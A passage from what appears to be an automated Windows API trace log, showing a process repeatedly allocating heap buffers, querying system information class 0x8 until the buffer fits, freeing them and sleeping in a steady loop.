dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0164.838] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0164.839] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0164.839] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0164.839] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0164.840] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0164.840] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0164.841] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0164.841] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0164.841] Sleep (dwMilliseconds=0x110) [0165.164] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0165.164] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0165.165] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0165.166] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0165.166] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0165.167] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0165.167] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0165.168] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0165.169] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0165.169] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0165.169] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0165.170] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0165.170] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0165.171] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0165.171] Sleep (dwMilliseconds=0x110) [0165.506] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0165.506] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0165.507] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0165.508] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0165.508] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0165.508] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0165.509] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0165.509] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0165.510] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0165.510] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0165.510] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0165.511] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0165.511] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0165.512] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0165.512] Sleep (dwMilliseconds=0x110) [0165.985] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0165.986] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0165.986] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0165.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0165.987] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0165.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0165.988] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0165.988] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0165.989] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0165.989] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0165.990] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0165.990] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0165.991] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0165.992] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0165.992] Sleep (dwMilliseconds=0x110) [0166.279] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0166.279] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0166.280] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0166.280] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0166.280] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0166.281] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0166.281] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0166.281] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0166.282] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0166.282] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0166.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0166.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0166.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0166.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0166.284] Sleep (dwMilliseconds=0x110) [0166.904] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0166.904] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0166.905] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0166.905] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0166.905] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0166.906] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0166.906] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0166.906] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0166.907] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0166.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0166.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0166.908] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0166.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0166.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0166.910] Sleep (dwMilliseconds=0x110) [0167.339] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0167.339] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0167.340] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0167.341] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0167.341] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0167.342] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0167.342] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0167.343] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0167.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0167.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0167.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0167.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0167.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0167.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0167.347] Sleep (dwMilliseconds=0x110) [0167.702] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0167.702] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0167.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0167.708] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0167.708] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0167.709] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0167.709] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0167.709] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0167.710] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0167.710] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0167.711] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0167.711] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0167.712] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0167.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0167.719] Sleep (dwMilliseconds=0x110) [0168.193] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0168.193] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0168.194] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0168.195] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0168.195] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0168.195] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0168.196] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0168.196] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0168.197] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0168.198] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0168.198] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0168.198] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0168.199] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0168.200] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0168.200] Sleep (dwMilliseconds=0x110) [0168.605] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0168.605] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0168.606] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0168.606] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0168.606] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0168.607] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0168.607] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0168.607] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0168.608] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0168.608] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0168.608] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0168.609] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0168.609] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0168.610] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0168.610] Sleep (dwMilliseconds=0x110) [0168.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0168.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0168.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0168.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0168.911] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0168.911] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0168.912] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0168.912] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0168.913] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0168.913] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0168.913] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0168.914] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0168.914] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0168.915] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0168.915] Sleep (dwMilliseconds=0x110) [0169.213] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0169.213] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0169.215] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0169.215] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0169.215] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0169.216] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0169.216] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0169.217] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0169.217] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0169.217] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0169.218] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0169.218] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0169.218] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0169.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0169.220] Sleep (dwMilliseconds=0x110) [0169.713] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0169.713] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0169.713] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0169.714] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0169.714] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0169.714] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0169.714] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0169.715] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0169.715] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0169.715] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0169.716] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0169.716] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0169.716] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0169.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0169.717] Sleep (dwMilliseconds=0x110) [0169.999] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0169.999] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0170.000] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0170.000] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0170.000] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0170.001] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0170.001] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0170.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0170.002] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0170.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0170.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0170.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0170.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0170.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0170.004] Sleep (dwMilliseconds=0x110) [0170.757] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0170.757] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0170.758] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0170.758] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 